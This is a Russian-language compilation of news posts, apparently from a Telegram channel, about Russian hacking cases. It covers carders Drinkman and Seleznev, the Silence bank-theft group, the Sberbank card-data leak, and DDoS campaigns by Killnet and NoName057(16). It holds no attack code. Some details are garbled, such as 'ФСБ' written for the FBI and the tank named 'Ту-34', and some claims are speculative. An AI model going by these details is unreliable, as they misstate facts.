12 утра 28 июня 2012 года. Самый известный русский кардер Владимир Дринкман и его жена спешат сесть в такси. Они пару минут назад получили информацию о том, что за ними следит ФБР. Однако сбежать пара не успела. На россиянина надели наручники и арестовали по обвинению в содействии организации того, что было названо крупнейшей преступной хакерской схемой, когда-либо расследовавшейся в Соединенных Штатах.

https://i.gyazo.com/dcf03adffcb4f9460bc4640308e107fe.png

Дринкмана обвинили в огромном количестве кибер-атак. Он грабил биржу Nasdaq, кредитные карты из Heartland Payment Systems, 7-Eleven, сеть супермаркетов Hannaford Brothers, Visa, Dow Jones и Jet Blue и другие.

Разумеется, он работал не один. По данным ФСБ группировка нанесла ущерб в размере более 300 миллионов долларов.

Это дело стало одним из самых обсуждаемых в сфере киберпреступности. Поймать русских хакеров не так просто не только из-за высокой степени защиты, но и из-за того факта, что многие из них также находятся в странах бывшего Советского Союза, где экстрадиция практически невозможна.

Тропу к амстердамскому отелю ФСБ строили годами

Изначально ФСБ даже не предполагали найти Дринкмана в Нидерландах. Разведка следила за Дмитрием Смилянец, 31-летним предполагаемым кибер-торговцом украденными данными.

https://i.gyazo.com/6aedca38de21986369accbaa38ffe143.png

Смилянец и Дринкман

В 2004 году был закрыт преступный форум, известный как DumpsMarket, онлайн-маркет по торговле украденными данными кредитных карт. Там и было обнаружено множество улик.

На форуме агенты заметили хакера по прозвищу Скорпо, которого вскоре связали с Дринкманом. Далее были замечены двое россиян под псевдонимами Anexx и Grigg. В ходе дальнейших исследований следователи обнаружили сообщника по прозвищу Сми. Большая часть группы держалась в тени.

Смилянец, он же Сми или Смелый, живший в Москве, оказался любителем вести публичную жизнь. Он руководил успешной командой онлайн-игр под названием «Москва 5», которая ездила на международные соревнования. У его аккаунта в Твиттере ddd1ms более 14 000 подписчиков. У него также есть аккаунт в ВК, группа и аккаунт в Facebook.

https://i.gyazo.com/61e64a6a42c5c20bfcd38d3bd6842ea3.png

Хакер Дмитрий Смилянец («Смелый»), 12 июля 2011 года

Moscow Five / YouTube

Следователи надеялись разоблачить всех фигурантов дела через Смилянец. «Мы знали, что если поймаем его, если он будет сотрудничать, он предоставит много информации о людях», — сказал чиновник.

Поэтому они наблюдали и ждали.

Каникулы в Амстердаме

Летом 2012 года Смилянец опубликовал в Facebook фото, где даже отметил геолокацию, которая указывала на Амстердам.

ФБР принялись за дело. За пару они сделали обзвон всех гостинец в округе и нашли ту самую, где проживал хакер.

Американцы договорились с голландской службой безопасности о поимке Смилянец. Голландская полиция сразу отправилась в отель Manor. Сотрудники подтвердили, что Смилянец был там с женой.

Но вот чудо — на хакера было снято два номера. Кто же во втором? Мистер Владимир Дринкман.

https://i.gyazo.com/0db16d54913892a1334ac7f08a0d2e58.png

ФБР точно знали, что Дринкман — это Скорпо, хотя это имя не появлялось на форуме уже много лет. Подняв все архивы американцы нашли интересный скрин с форума DumpsMarket. Там было следующее: сообщение от Scorpo администратору форума с просьбой сменить ник — на Anexxian. Тот самый ник, чьего владельца ФБР искали годами.

28 июня в 8:30 утра по Амстердаму в отель прибыли голландские полицейские в сопровождении агентов Секретной службы. Смилянца арестовали сразу. Его жена принялась тайно звонить жене Дринкмана и сообщать новости об аресте.

По словам официальных лиц, Дринкман позвонил на стойку регистрации и вызвал такси, но дальше заднего сиденья он не продвинулся. «Он не сопротивлялся», — сказал представитель голландской полиции Вим де Брюин. «Было спокойно и гладко».

https://i.gyazo.com/b720e63c741ed4fb66de7dd7f21a94c9.png

Именно так произошла поимка самого известного русского кардера. На протяжении нескольких лет он успешно сковывался, но был пойман из-за подельника, любившего выкладывать фото своих приключений в сеть.

https://i.gyazo.com/9f811c3dbcec2c77a16a1a09698484f6.jpg

Вступить в наш чат

Ещё одна легендарная история о русском хакере, который украл более 169 миллионов долларов.

32-летний мужчина из Владивостока был приговорен к 27 годам лишения свободы за преступления, связанные с компьютерным взломом.

Роман Валерьевич Селезнев, он же Track2, был осужден в августе 2016 года по 38 пунктам обвинения, связанным с его схемой взлома компьютеров торговых точек с целью кражи номеров кредитных карт и продажи их на веб-сайта даркнета.

https://i.gyazo.com/7b2a7328fcc7c771700e80b6d58c4532.png

Роман сын Валерия Селезнёва, действующего депутата Госдумы РФ от партии ЛДПР. Отец не раз пытался спасти сына от уголовного преследования: заявлял, что Романа на самом деле похитило правительство США. А когда доказательства мошеннических действий Track2 были неоспоримыми отец подавал множество апелляций в суд, но все тщетно.

https://i.gyazo.com/64218c89451b25adb4ca774598d3d50f.png

Хакер известен на подпольных форумах под никами Bulba, Track2, 2pac, nCuX и др. Он сам торговал дампами через сайты POS Dumps, track2.tv, bulba.cc, 2рас.сс — на последнем продавались миллионы дампов, снятых из терминалов магазинов Target, Neiman Marcus, Michaels, Staples и Home Depot, в 2013-2014 годы это был крупнейший магазин дампов в интернете.

Согласно доказательствам, представленным в суде, в период с октября 2009 г. по октябрь 2013 г. Селезнев взламывал системы розничных точек продаж и устанавливал вредоносное программное обеспечение, которое позволило ему украсть миллионы номеров кредитных карт более чем 500 американских компаний и отправить данные на серверы, которые он контролировал в России, Украине и Маклине, Вирджиния. Затем Селезнев объединил информацию о кредитных картах в группы, называемые «базами», и продал информацию о различных криминальных кардинговых сайтах покупателям, которые использовали их для мошеннических покупок, согласно доказательствам, представленным в ходе судебного разбирательства по этому делу.

Многие из предприятий, на которые нацелился Селезнев, были малыми предприятиями и включали рестораны и пиццерии в Западном Вашингтоне, в том числе Broadway Grill в Сиэтле, который был обанкротился после кибератаки. Схема Селезнева нанесла примерно 3700 финансовым учреждениям убытки на сумму более 169 миллионов долларов.

https://i.gyazo.com/a0d7fdf62c857f52f57f4149268a52ff.png

Селезнева взяли под стражу в июле 2014 года на Мальдивах, а находящийся у него на тот момент ноутбук содержал более 1,7 миллиона украденных номеров кредитных карт, в том числе некоторых из предприятий в Западном Вашингтоне. Ноутбук также содержал дополнительные доказательства, связывающие Селезнева с серверами, учетными записями электронной почты и финансовыми транзакциями, задействованными в схеме. Представленные в суде доказательства показали, что Селезнев заработал на своей преступной деятельности десятки миллионов долларов.

Селезнев был осужден 25 августа 2016 г. по 10 пунктам обвинения в мошенничестве с использованием электронных средств связи, восьми пунктам обвинения в умышленном повреждении защищенного компьютера, девяти пунктам обвинения в получении информации с защищенного компьютера, девяти пунктам обвинения в хранении 15 и более устройств несанкционированного доступа и двум пунктам обвинения. количество случаев кражи личных данных при отягчающих обстоятельствах.

"Преступное предприятие Селезнева было одновременно изощренным и обширным, с транснациональными последствиями», — сказал ответственный специальный агент Роберт Л. Кирстед из Секретной службы США.

Селезнев также обвиняется в отдельном обвинительном акте округа Невада в участии в коррупционной организации, находящейся под влиянием рэкета (RICO), и сговоре с целью участия в коррупционной организации, находящейся под влиянием рэкета, а также в двух пунктах обвинения в хранении 15 или более контрафактных и несанкционированных устройств. Кроме того, в Северном округе Грузии Селезневу предъявлено обвинение в заговоре с целью совершения банковского мошенничества, одном эпизоде банковского мошенничества и четырех пунктах обвинения в мошенничестве с использованием электронных средств.

На свободе у Романа осталась гражданская жена и маленькая дочка. По словам жены, Роман был "обычным пользователем компьютера" и точно не виноват во всех присвоенных ему злодействах. А его отец не забыл подчеркнуть тот факт, что Роман в университете учился на гуманитарной специальности и с компьютерами встречался редко.

https://i.gyazo.com/becc50f2ac8e8bd21e46faf5dcf3fa0e.png

https://i.gyazo.com/f5504924188da3aed233ea714ca6abfa.jpg

Вступить в наш чат

Group-IB разоблачил атаки группы хакеров, работающих с 2016 года. Хотя банда ранее нападала на российские банки, эксперты Group-IB также обнаружили доказательства деятельности группы более чем в 25 странах мира. Group-IB опубликовала свой первый подробный отчет о тактике и инструментах, используемых Silence. Гипотеза аналитиков безопасности Group-IB заключается в том, что по крайней мере один из членов банды является бывшим или нынешним сотрудником компании, занимающейся кибербезопасностью. Подтвержденный ущерб от деятельности Silence оценивается в 800 000 долларов США.

https://i.gyazo.com/334f785fa5b72fcf5cdf6cbd597352b4.png

Silence — это группа русскоязычных хакеров, судя по их языку команд, расположению используемой ими инфраструктуры и географии их целей (Россия, Украина, Беларусь, Азербайджан, Польша и Казахстан). Хотя фишинговые письма рассылались также банковским служащим в Центральной и Западной Европе, Африке и Азии). Кроме того, Silence использовала русские слова, набранные на английской раскладке клавиатуры, для команд используемого бэкдора. Хакеры также использовали услуги русскоязычного веб-хостинга.

По данным Group-IB, в течение последних трех лет группа проводила тайные кибератаки на финансовые учреждения в России и Восточной Европе.

Группа оставалась незамеченной в течение многих лет, в основном из-за ее предрасположенности к использованию законных приложений и инструментов, уже найденных на компьютерах жертв.

https://i.gyazo.com/8659228e5e84881fed4bc18d854babdf.png

Но Silence также создали свои собственные инструменты, такие как:

Silence — основа для атак на инфраструктуру;

Атмосфера — набор программных средств для атак на банкоматы;

Farse — инструмент для получения паролей со взломанного компьютера;

Cleaner — инструмент для удаления логов.

Эти инструменты в сочетании с тактикой скрытности помогли группе оставаться незамеченной гораздо дольше, чем многим ее коллегам.

Как ФБР удалось раскрыть самых аккуратных хакеров? Расскажем в следующей части.

https://i.gyazo.com/fe343ee55bc0a3fdbd26cf634a7bfea3.png

https://i.gyazo.com/0f96d3420159998d6688b2add140c113.jpg

Вступить в наш чат

Давайте разберемся, кто стоит за группировкой хакеров, прозванными самыми аккуратными мошенниками в мире.

Кто такие Silence Group

У команды Silence есть две четкие роли: оператор и разработчик. Предположительно, Оператор является лидером группы. Он действует как тестировщик, который обладает глубокими знаниями инструментов для проведения тестирования на проникновение в банковские системы. Эти знания позволяют группе легко ориентироваться внутри банка. Именно оператор получает доступ к защищенным системам внутри банка, а затем осуществляет кражу.

Разработчик является квалифицированным реверс-инженером. Он отвечает за разработку инструментов для проведения атак, а также способен модифицировать сложные эксплойты и стороннее программное обеспечение. Кроме того, разработчик обладает достаточными знаниями о процессах, системах ATM и имеет доступ к непубличным образцам вредоносных программ, которые обычно доступны только охранным компаниям.

Отличительной особенностью Silence является их нетипичная ролевая структура и небольшой размер. Оказывается, в эту русскоязычную группу входят всего два человека.

https://i.gyazo.com/a433306156cf93ad6b817bc1540a22dc.png

Как и в большинстве финансово мотивированных APT-групп, члены Silence являются русскоговорящими, о чем свидетельствует язык команд, приоритеты в размещении арендуемой инфраструктуры, выбор русскоязычных хостинг-провайдеров и местоположение целей.

Команды троянца Silence - это русские слова, набранные с использованием английской раскладки:

htrjyytrn > реконнект (повторное подключение) htcnfhn > рестарт (перезапуск) ytnpflfybq > нетзадач (нет задач)

Основные цели находятся в России, хотя фишинговые электронные письма были отправлены сотрудникам банков более чем в 25 странах Центральной и Западной Европы, Африки и Азии.

Для аренды серверов Silence использует русскоязычных хостинг-провайдеров.

Преступления самых аккуратных хакеров

Успешные атаки Silence в настоящее время были ограничены странами СНГ и Восточной Европы. Их основные цели расположены в России, Украине, Беларуси, Азербайджане, Польше и Казахстане.

Однако некоторые фишинговые электронные письма были отправлены сотрудникам банка более чем в 25 странах Центральной и Западной Европы, Африки и Азии.

https://i.gyazo.com/8378e444225221913344184f820701a7.png

Хронология атак

Июль 2016 — хакерам не удалось вывести деньги через российскую AWS CBR. Сотрудники банка быстро заметили подмену документов и залатали дыру в системе.

Август 2016 — всего за месяц хакеры снова получили доступ к системам AWS CBR. На этот раз банк попросил Group-IB отреагировать на инцидент. Атака была остановлена. Однако полный журнал инцидента восстановить было невозможно, поскольку в попытке очистить сеть ИТ-команда банка удалила большинство следов злоумышленника.

Октябрь 2017 года — наконец удачная кибератака. На этот раз Сайленс атаковал банкоматы и украл более 100 000 долларов всего за одну ночь. В том же году они провели DDoS-атаки с использованием IRC-бота Perl и общедоступных IRC-чатов для контроля троянов. После неудачной попытки с системой межбанковских транзакций в 2016 году преступники не пытались вывести деньги с помощью системы, даже получив доступ к серверам AWS CBR.

Февраль 2018 — успешная атака с использованием обработки карт. Они сняли более 550 000 долларов через банкоматы банка-партнера.

Апрель 2018 — через два месяца группа вернулась к своему проверенному методу и снова сняла средства через банкоматы. За одну ночь они выкачали около 150 000 долларов. На этот раз инструменты Silence были значительно изменены: они не были обременены избыточными функциями и стабильно работали без ошибок.

Что с Silence сейчас

На момент 2023 года хакеры так и не были пойманы, что говорит об их исключительной системе безопасности. На сегодняшний день расследование продолжается, но с 2018 года нет официальных заявлений или отчетов об активности Silence. Команда полностью оправдывает своё название — "Тишина".

https://i.gyazo.com/52d80e826772f7f39565daa1b2f63172.png

https://i.gyazo.com/d0a1463d2a6bc41f70ccf0fdf54e9f88.jpg

Вступить в наш чат

Международные эксперты по кибербезопасности подсчитали, что в 2019 году кибератаки происходили во всем мире каждые 14 секунд. Сегодня вспомним о том, как хакеры украли данные на 2,5 трлн. долларов.

https://i.gyazo.com/f3e5931abdde56cc696a5b3bf751b5f1.png

Что произошло

Данные миллионов клиентов обнаружены на черном рынке в результате крупнейшей в истории утечки информации о кибербезопасности в российском банковском секторе.

Аналитики компании DeviceLock, занимающейся кибербезопасностью, обнаружили личную информацию, относящуюся к 60 миллионам держателей кредитных карт Сбербанка, для продажи на черном рынке. Им удалось проанализировать данные около 200 предполагаемых клиентов, предоставленные им продавцом, и проверить их подлинность.

Российская газета «Коммерсант» дополнительно проверила некоторые данные, успешно найдя в базе данных данные кредитных карт своих журналистов, включая личные данные, такие как их место работы за последние три года.

«Это самая большая и подробная банковская база данных, которая когда-либо появлялась на черном рынке», — сказал основатель DeviceLock Ашот Оганесян.

«В мировом рейтинге банковских утечек это можно считать крупным инцидентом. Для российского рынка это абсолютный рекорд, по крайней мере, за последние десять лет», — сказал он The Moscow Times.

Данные появились для продажи на сайте, который заблокирован российским регулятором связи Роскомнадзором. Предполагается, что утечка данных могла произойти в конце августа 2019.

https://i.gyazo.com/ad201225d59c02e67dde80103c05ef56.png

Что ответил банк

Сбербанк подтвердил утечку данных «не менее 200 клиентов», заявив, что утечка могла произойти от сотрудника банка.

В официальном заявлении на своем сайте банк сказал:

«На данный момент проводится служебное расследование, о его результатах будет сообщено в будущем. Наиболее вероятным объяснением произошедшего являются умышленные преступные действия сотрудника, так как внешнее проникновение в базу данных невозможно из-за ее изолированности от внешней сети. Украденная информация ни в коем случае не угрожает сохранности средств клиентов», — говорится в сообщении.

В частности, в Сбербанке заявили, что, поскольку просочившаяся информация не содержит трехзначных CVV-кодов кредитных карт, а клиенты также требуют код подтверждения в текстовом сообщении для совершения онлайн-платежей, клиенты не подвергаются риску мошенничества.

Какой масштаб трагедии на самом деле

Однако Оганесян сообщил The Moscow Times, что в результате утечки клиенты Сбербанка стали жертвами «различных видов мошенничества». В частности, он выделил телефонное мошенничество, сославшись на инцидент, произошедший ранее в этом году, когда клиентам Сбербанка звонили мошенники, выдававшие себя за представителей банка.

Сообщается, что в сеть утекли данные о 60 миллионов карт пользователей Сбербанка. Эта утечка стала самой масштабной за всё время работы банка.

https://i.gyazo.com/8ad7858777b021943e70070724169929.png

Кто взломал

За всё время расследования Сбербанк так и не вышел на преступников. Во всяком случае, не делал официальных заявлений о том, что хакеры найдены и наказаны.

Служба безопасности Сбера сообщила о своей версии произошедшего: к взлому причастны работники банка, розыск которых всё ещё ведётся.

https://i.gyazo.com/a3ad993b5bd5779425a3ddf2516a0f85.png

https://i.gyazo.com/03271f308ce0557dcc3408363e6b0bfe.jpg

Вступить в наш чат

Эта история началась еще летом. Эстония попала под волну кибератак из-за того, что снесла несколько советских памятников.

«В августе 2022 Эстония подверглась самым масштабным кибератакам, с которыми она сталкивалась с 2007 года», — написал в Twitter заместитель министра экономики и коммуникаций Эстонии Луукас Ильвес.

Ильвес также сказал, что ддосу подверглись не только правительственные сайты, но и частные учреждения.

Ответственность за атаки взяла на себя российская хакерская группа Killnet, заявившая в своей учетной записи Telegram, что она заблокировала доступ к более чем 200 государственным и частным эстонским учреждениям, таким как онлайн-система идентификации граждан.

https://i.gyazo.com/d3c66c97e6bc92187cb81a9348a53fcb.png

Killnet, заявившая об аналогичной атаке на Литву в июне, заявила, что действовала после того, как во вторник в городе Нарва, недалеко от границы Эстонии с Россией, была изъята из публичного обозрения копия советского танка Ту-34 времен Второй мировой войны и доставлена в Эстонию.

Ранее эстонское правительство распорядилось о скорейшем сносе всех общественных мемориалов советской эпохи в преимущественно русскоязычном городе, сославшись на растущую там напряженность и обвинив Москву в попытке использовать прошлое для разделения эстонского общества.

Напряженность вокруг советских памятников

При DDoS-атаке хакеры пытаются завалить сеть необычно большими объемами трафика данных, чтобы парализовать ее, когда она больше не может справляться с объемом запрошенных данных.

Эстония, член Европейского союза и НАТО, приняла меры по усилению кибербезопасности в 2007 году после масштабных DDoS-атак на публичные и частные веб-сайты, ответственность за которые она возложила на российских субъектов, разгневанных его удалением во время еще одного памятника советской эпохи.

https://i.gyazo.com/12019c31be6552de9d3678229afe65b5.png


Как и ее балтийские соседи, Эстония снесла множество памятников, прославляющих Советский Союз или коммунистических лидеров, с тех пор, как страна восстановила независимость в 1991 году.

Правительство и многие эстонцы рассматривали памятник в Таллинне как болезненное напоминание о 50-летней советской оккупации, в то время как некоторые этнические русские рассматривали его снос как попытку стереть свою историю.

Эти события напомнили о том, как в 2007 году группа русских хакеров уже совершала кибератаку на Эстонию. В следующем выпуске расскажем о том, какой ущерб понесло правительство Эстонии, а также удалось ли им раскрыть и наказать нарушителей.

https://i.gyazo.com/4d32fbbc438602a36fb31f231c1f5a97.png

https://i.gyazo.com/112375db00f03d67324f2410d393a084.jpg

Вступить в наш чат

Прошлым летом российская хакерская группа, известная как Cold River, атаковала три ядерные исследовательские лаборатории в Соединенных Штатах, согласно интернет-записям, просмотренным Reuters и пятью экспертами по кибербезопасности.

В период с августа по сентябрь, когда Владимир Путин указал, что Россия будет готова использовать ядерное оружие для защиты своей территории, Cold River нацелился на национальные лаборатории в Брукхейвене (BNL), Аргонне (ANL) и Ливерморе Лоуренса (LLNL). {акеры создают поддельные страницы входа для каждого учреждения и рассылают электронные письма ученым-ядерщикам, пытаясь заставить их раскрыть свои пароли.

https://i.gyazo.com/856f3618817a1c3a3dbba7acf6282d4b.png

Кто такие Cold River

Cold River впервые попала в поле зрения специалистов разведки после нападения на министерство иностранных дел Великобритании в 2016 году. За последние годы она была замешана в десятках других громких хакерских атак. Агентство Reuters отследило учетные записи электронной почты, использованные в его хакерских операциях в период с 2015 по 2020 год, до ИТ-специалиста в российском городе Сыктывкар.

«Это одна из самых важных хакерских групп, о которых вы никогда не слышали», — сказал Адам Мейерс, старший вице-президент по разведке американской компании по кибербезопасности CrowdStrike. «Они участвуют в прямой поддержке информационных операций Кремля».

https://i.gyazo.com/56f88b70dae0465c40470209931fceed.png

Западные чиновники заявляют, что российское правительство является мировым лидером в области хакерских атак и использует кибершпионаж, чтобы шпионить за иностранными правительствами и отраслями, чтобы получить конкурентное преимущество. Однако Москва последовательно отрицает, что проводит хакерские операции.

В мае Cold River взломал и слил электронные письма, принадлежащие бывшему главе британской разведывательной службы МИ-6. Это была лишь одна из нескольких операций «взлома и утечки», проведенных в прошлом году хакерами, связанными с Россией, в ходе которых конфиденциальные сообщения были обнародованы в Великобритании, Польше и Латвии.

По данным французской фирмы по кибербезопасности Sekoia.io, во время другой недавней шпионской операции, направленной против критиков Москвы, компания Cold River зарегистрировала доменные имена, имитирующие как минимум три европейские неправительственные организации, расследующие военные преступления.

Попытки взлома, связанные с неправительственными организациями, имели место непосредственно перед и после опубликования 18 октября доклада независимой следственной комиссии ООН, в котором было установлено, что российские силы несут ответственность за «подавляющее большинство» нарушений прав человека в первые недели войны на Украине.

https://i.gyazo.com/0856e6133f016b65c20e842d4ac4d6c9.png

https://i.gyazo.com/e30495b4b5004452a8b1e9f48f48646b.png

Вступить в наш чат

Пророссийская хакерская группа взяла на себя ответственность за временное закрытие нескольких веб-сайтов аэропортов США.

Кибератаки, о которых заявила Killnet, затронули, в частности, веб-сайты Los Angeles International, Chicago O'Hare и Hartsfield-Jackson International в Атланте.

Хакеры разместили список аэропортов в Telegram, призывая хакеров участвовать в так называемой DDoS-атаке — распределенном отказе в обслуживании, когда компьютерная сеть переполняется одновременными передачами данных.

Кто пострадал

Призыв хакеров к действию включал аэропорты по всей стране, включая Алабаму, Аризону, Арканзас, Калифорнию, Колорадо, Коннектикут, Делавэр, Флориду, Джорджию, Гавайи, Айдахо, Иллинойс, Индиану, Айову, Канзас, Кентукки, Луизиану, Мэриленд, Массачусетс, Мичиган, Миннесота, Миссисипи и Миссури.

https://i.gyazo.com/e632d641589a2f7ffd45a2334cfd6f40.png

Не сразу стало ясно, сколько аэропортов действительно пострадало и все ли сайты пострадавших пострадали.

В Атланте власти заявили, что ATL.com «заработал после инцидента рано утром, который сделал его недоступным для публики». Но люди в Твиттере продолжали жаловаться на то, что части сайта были недоступны в течение нескольких часов после того, как было сделано объявление.

Какие ещё атаки сделали Killnet

В более раннем сообщении Killnet отметил другие уязвимые сайты США, которые могут подвергнуться аналогичным DDoS-атакам, включая морские терминалы и логистические объекты, центры мониторинга погоды, системы здравоохранения, системы метро, а также биржи и системы онлайн-торговли.

Хакеры поздравили несколько команд, которые, помогли вывести сайты из строя, написав: «Кто участвовал в ликвидации Соединенных Штатов Америки, не останавливайтесь !!»

Атаки последовали за очередной волной кибератак. В этом случае хакеры взяли на себя ответственность за то, что сплотила хакеров для отключения государственных сайтов штата.

https://i.gyazo.com/529f4a7e6e4acb4d3a009ad8ade72583.png

https://i.gyazo.com/899bd0527a95c15f51f5587c27c1c41f.jpg

Вступить в наш чат

Группировка NoName057(16) утверждает, что они атаковали центральный банк Дании, министерство финансов и 7 частных кредиторов. Хакеры объяснили взломы тем, что «Дания поддерживает украинских неонацистов».

Что произошло

В январе русские хакеры заявили, что они ответственны за кибератаки на сайты Дании. В этот раз взлом осуществляли не Killnet, которые еще в декабре взломали сайт ФБР США, а хакеры из группировки NoName057(16).

Взлому подверглись интернет-странички ЦБ Дании и семи частных банков. Также хакеры атаковали сайт Минфин Дании.

https://i.gyazo.com/4edad1168086341c56c9e6505e2e6090.png

В чем причина

Для разъяснения своих действий группировка представила анонимного представителя, который рассказал, что поддержка Украины Данией стала причиной многочисленных атак на важные сайты государства.

«Дания поддерживает украинских неонацистов, — заявила группировка местным СМИ. — Этого достаточно, чтобы мы начали атаку на важнейшую инфраструктуру вашей страны. Банковский сектор был выбран потому, что он является одним из важнейших компонентов этой критически важной инфраструктуры».

Что было взломано

Из-за кибератак пострадали многие банки:

Danske Bank

Jyske Bank

Sydbank

Sparekassen Sjælland-Fyn

Bankinvest

Arbejdernes Landsbank

Handelsbanken

https://i.gyazo.com/3febe7e409a1ff03062cda9f446a0587.png

Атаки происходили с 9 по 11 января. Целых три дня большинство банков Дании были полностью или частично недоступны как для администрации, так и для клиентов.

Группа также взяла на себя ответственность за еще одну атаку на Национальный банк Дании, однако заявила, что это заявление не было опубликовано по ее официальным каналам, поскольку атака не нарушила глобальную работу веб-сайта.

Датские эксперты по кибербезопасности ранее выразили подозрения в отношении хакерской группы Killnet за ее роль в атаках.

Заключение

Друзья, благодарим, что вы с нами и активно следите за новостями в мире киберпреступлений. Мы продолжаем следить за развитием событий и будем держать вас в курсе. Как вы думаете, какой следующий ход стоит ожидать от Killnet и NoName057(16)?

https://i.gyazo.com/90682942d315cf9cd58b9fd691596cae.png

https://i.gyazo.com/dde605cf5c2d00132857cfe5a9f4a19b.jpg

Вступить в наш чат

Cуд освободил под залог гражданина России Михаила Шаргена, который был арестован CBI за предполагаемый взлом экзаменационного программного обеспечения JEE. Хакерской атакой воспользовались более 800 абитуриентов.

https://i.gyazo.com/dfb4f7b569def038890eca3b1d986f1e.png

Освобожден под залог

25-летний Шарген, арестованный 3 октября, якобы вмешался в программное обеспечение iLeon, платформу, на которой проводился экзамен JEE (Main)-2021, чем помог абитуриентам успешно пройти вступительные испытания. Шарген был одним из участников большой схемы, специализировавшийся на взломе онлайн-экзаменов.

По словам чиновников, суд CBI принял к сведению тот факт, что все остальные сообвиняемые по делу были освобождены под залог, в том числе те, кто напрямую контактировал с кандидатами и их родителями для получения денег и документов. Аргументы CBI о том, что роль Шаргена не соответствовала роли других обвиняемых, поскольку он сыграл важную роль во взломе программного обеспечения, были отклонены судом.

https://i.gyazo.com/daa68f11668410038fb507ec90f72bc1.png

«Только потому, что заявитель является иностранным гражданином, ему не может быть отказано в освобождении под залог, особенно когда его паспорт уже изъят следственным органом», — заявил суд, разрешая ходатайство об освобождении под залог.

Суд разрешил освободить Шаргена под личное поручительство в размере одного миллиона рупий (891 тысяча рублей) и под залог.

В чем обвиняется

Шарген был арестован 3 октября по прибытии в международный аэропорт имени Индиры Ганди из Алматы, Казахстан. В сентябре прошлого года агентство арестовало Affinity Education Pvt Ltd и трех ее директоров Сиддхарта Кришну, Вишвамбхара Мани Трипати и Говинда Варшни, а также других рекламщиков и сообщников за предполагаемое манипулирование экзаменом.

Утверждалось, что три директора в сговоре с другими партнерами и рекламщиками манипулировали онлайн-экзаменом JEE (Mains) и содействовали поступающим студентам в лучшие национальные технологические институты в обмен на огромные суммы денег. Раньше они решали вопросы через удаленный доступ из выбранного экзаменационного центра в Сонепате (Харьяна).

«Утверждалось также, что обвиняемые в целях безопасности получали листы с отметками для 10-го и 11-го классов, идентификаторы пользователей, пароли и чеки абитуриентов в разных частях страны. Cумма варьируется от 12-15 лакхов (более 1 миллиона рублей) на кандидата», — говорится в сообщении CBI.

Что с хакером сейчас

Расследование до сих пор ведется, суд устанавливает виновность Михаила Шаргена. В данный момент он отпущен под залог за неимением достаточного количества доказательств. Команда BlackMast следит за развитием событий.

https://i.gyazo.com/044183a0b97410493cad3a199420f6a0.jpg

Вступить в наш чат

Что произошло

Несколько немецких аэропортов заявили 16 февраля, что их веб-сайты не работают из-за предполагаемых кибератак. Аэропорты в Дюссельдорфе, Нюрнберге и Дортмунде были взломаны.

https://i.gyazo.com/aa9a6dc66116beffbcaefcf88172e625.png

Сайты стали мишенью так называемых атак «распределенного отказа в обслуживании» (DDoS- атака), предназначенных для того, чтобы перегрузить цель потоком интернет-трафика, препятствуя нормальному функционированию системы.

https://i.gyazo.com/65aec44efd1321216458811f5e20c46c.png

«Сайт перегружен огромным спросом», — сказал представитель аэропорта Нюрнберга, добавив, что «неясно», когда он вернется к нормальной жизни.

Кто за этим стоит

Немецкое новостное издание Der Spiegel сообщило, что ответственность за атаку взяла на себя группа российских хакеров, хотя власти не прокомментировали, кто именно взломал сайты аэропортов.

Германия находится в состоянии повышенной готовности к российским кибератакам с тех пор, как Россия начала спецоперацию на Украине.

https://i.gyazo.com/942acdd9755f99ff0c1c3f01036c778b.png

Были ли еще атаки

В прошлом месяце веб-сайты аэропортов, органов государственного управления и организаций финансового сектора подверглись кибератакам, которые, по словам властей, были спровоцированы российской хакерской группой.

Федеральное управление информационной безопасности заявило в октябре, что уровень угрозы хакерских атак и других киберпреступлений был выше, чем когда-либо.

https://i.gyazo.com/1969e274729fc48f566560bf079b3961.png

Заключение

Русские хакеры активно взламывают структуры Германии. На прошлой неделе немецкий авиационный гигант Lufthansa был вынужден отменить или задержать рейсы из-за серьезного сбоя в работе ИТ, вызванного строительными работами во Франкфурте, где находится его главный офис. Не исключено, что это тоже кибер-атака от хакеров из России.

Команда BlackMast внимательно следит за развитием событий и оперативно рассказывает о новых взломах.

https://i.gyazo.com/ef2254c90f7c00270179c5b357e8432b.jpg

Вступить в наш чат

Что произошло

Нэнси Файзер, министр внутренних дел Германии, сообщила, что Германия сейчас подвержена «огромной опасности» со стороны русских хакеров. Риск диверсий, дезинформации и шпионских атак высок как никогда.

В своем сообщении Файзер заявила, что Владимир Путин вкладывает огромные ресурсы в кибератаки, что является ключевой частью его тактики. «Война усугубила проблемы кибербезопасности. Участились атаки пророссийских хакеров», — сказала она в интервью новостной сети Funke Mediengruppe, опубликованном в воскресенье.

https://i.gyazo.com/4a2b5df94edc9a61bd80c7d329ab0d07.png

Нэнси Файзер, министр внутренних дел Германии

По словам Файзер, опасность спонсируемой и управляемой государством шпионской и диверсионной деятельности со стороны России остается очень высокой. Министр внутренних дел призвала федеральное и региональное правительства к совместной работе по отражению кибератак. «Мы конкурируем с постоянно новыми способами атаки и технологиями», — сказала она.

В чем причина

С тех пор, как Германия начала поддерживать Украину поставками оружия и введением санкций против России, кибератаки участились, в частности, против поставщиков энергии и военных организаций. Эксперты по безопасности предупреждают о значительной опасности, которую они представляют для внутренней безопасности Германии, в частности, о способности кибератак атаковать критически важную инфраструктуру, а также политические операции, такие как Бундестаг. Также недавно российские хакеры взломали сайты аэропортов Германии, об этом мы писали в предыдущем выпуске.

Немецкий парламент стал целью одной из крупнейших кибератак, с которыми когда-либо сталкивалась Германия, в мае 2015 года, когда была атакована внутренняя компьютерная система, украдены данные и отключены офисы депутатов. Предполагается, что за атакой стоит ГРУ, российская военная разведка.

https://i.gyazo.com/1f77643a3b51afe74abf3bae2a0e5f11.png

Были ли еще атаки

В 2020 году был взломан личный кабинет бывшего канцлера Ангелы Меркель. Тот взлом она назвала «возмутительным».

Хакерская группировка Ghostwriter, которая якобы находится под контролем российских спецслужб, вскоре после начала спецоперации провела несколько взломов в Германии. В последние недели кибератаки были совершены на все инфраструктуры: от аэропортов до администрации мэрии. Российская группа Killnet недавно объявила, что планирует обратить более пристальное внимание на разрушение жизни в Германии.

Эксперты в области цифровых технологий заявили, что Германия находится в состоянии «постоянного огня» со стороны хакеров. Финансовые институты, заводы по производству вооружений, поставщики энергии, гуманитарные организации и налоговые органы стали объектами атак. Эксперты говорят, что атаки часто хорошо замаскированы и определить их местоположение не так просто.

Вольфганг Вин, вице-президент берлинской службы внешней разведки BND, предупредил на конференции по безопасности в Потсдаме прошлым летом, что в цифровой мир Германии проникли хакеры из России и Китая. «Россия в наших сетях, Китай в наших сетях», — сказал он.

Как меняется ситуация

